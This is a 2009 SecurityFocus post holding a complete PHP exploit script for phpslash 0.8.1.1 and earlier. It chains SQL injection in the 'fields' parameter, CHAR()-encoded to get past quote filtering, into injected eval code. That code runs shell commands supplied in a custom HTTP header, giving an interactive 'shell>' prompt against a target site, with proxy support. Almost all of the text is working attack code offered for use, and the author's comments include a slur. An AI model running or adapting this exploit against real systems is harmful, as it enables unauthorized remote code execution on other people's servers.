phpslash <= 0.8.1.1 Remote Code Execution Exploit Feb 01 2009 10:38AM
gmdarkfig gmail com
#!/usr/bin/php -q

<?php

#

# This file requires the PhpSploit class.

# If you want to use this class, the latest

# version can be downloaded from acid-root.new.fr.

##################################################

#

# phpslash <= 0.8.1.1 Remote Code Execution Exploit

# - - - - - - - - - - - - - - - - - - - - - - - - -

# RCE with no special rights (guest).

# No special PHP conditions required.

# - - - - - - - - - - - - - - - - - - - - - - - - -

# #0 It was a private sploit, but I decided to publish

# it #1 You did the fag on that one bro, it will not happen

# again =). #2 Don't try to use it on hzv, I helped them

# to patch this one before I publish it =)

# - - - - - - - - - - - - - - - - - - - - - - - - -

# Exploitation steps:

# 1 - include/class/tz_functions.inc tz_strftime()

# 2 - include/class/tz_functions.inc tz_generic()

# 3 - include/tz_env.class generic()

#

error_reporting( E_ALL ^ E_NOTICE );

require('phpsploitclass.php');

// Main function

function main()

{

// :)

$web = new phpsploit();

$web->agent( 'Mozilla Firefox' );

// Hey ya :)

head();

// Target

$url = get_p( 'url', true );

// Proxy options

$prh = get_p( 'proxhost' );

$pra = get_p( 'proxauth' );

// Use a proxy ?

if( $prh )

{

// host:ip

$web->proxy( $prh );

// Authentication

if( $pra )

$web->proxyauth( $pra );

}

// Single quote bypass

$byp = "1');";

// PHP code

$php = 'eval(base64_decode($_SERVER[HTTP_MYPCODE]));';

// Separator

$s_sep = md5( rand( 0, 1000000000 ) . 'HEY_YA' );

$c_sep = "print('$s_sep');";

// Final PHP code

$final = $byp . $c_sep . $php . $c_sep . 'exit();//';

// Welcome guess !

while( ($cmd = cmd_prompt()) !== false )

{

// magic_quotes_gpc bypass

$web->addheader( 'MypCode', base64_encode( 'system("' . add_slashes($cmd) . '");' ) );

// Go =]

$web->get( $url . 'index.php?fields=' . to_char( $final ) . ',1' );

// Result

$res = explode( $s_sep, $web->getcontent() );

// Erf

if( !isset( $res[1] ) )

{

print "\nFailed";

exit(1);

}

// Cool

else

{

if( empty( $res[1] ) )

print "\nNo output: system() disabled OR cmd failed OR cmd without output";

else

print "\n" . $res[1];

}

}

return;

}

// No more bug with " and $

function add_slashes( $str )

{

return str_replace( '$', '\\$', addslashes( $str ) );

}

// Command prompt

function cmd_prompt()

{

print "\nshell>";

$cmd = trim( fgets( STDIN ) );

// Wanna stop =( ?

if( in_array( strtolower( $cmd ) , array( 'exit', 'quit' ) ) )

return false;

else

return $cmd;

}

// MySQL CHAR() encoding

function to_char( $data )

{

$chars = 'CHAR(';

$len = strlen( $data );

for( $i = 0; $i < $len; $i++ )

{

$chars .= ord( $data[ $i ] );

if( $i != $len-1 )

$chars .= ',';

}

return $chars . ')';

}

// CLI params

function get_p( $p, $exit = false )

{

foreach( $_SERVER['argv'] as $key => $value )

{

if( $value === '-' . $p )

{

if( isset( $_SERVER['argv'][ $key+1 ] ) &&

!empty( $_SERVER['argv'][ $key+1 ] ) )

{

return $_SERVER['argv'][ $key+1 ];

}

else

{

if( $exit )

usage();

return true;

}

}

}

if( $exit )

usage();

return false;

}

// Headers =)

function head()

{

print "\nphpslash <= 0.8.1.1 Remote Code Execution Exploit\n";

print "-------------------------------------------------\n\n";

print " About: \n";

print " by DarkFig < gmdarkfig (at) gmail (dot) com >\n";

print " http://acid-root.new.fr/\n";

print " #acidroot (at) irc.worldnet (dot) net [email concealed]\n\n";

return;

}

// Usage, can help..

function usage()

{

print " Usage:\n";

print " php spl.php -url <website> [options]\n\n";

print " Example:\n";

print " php spl.php -url http://victim.com/\n\n";

print " Options:\n";

print " -proxhost <ip:port> if you wanna use a proxy\n";

print " -proxauth <usr:pwd> proxy with authentication\n";

exit(0);

}

// Run baby

main();

?>

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus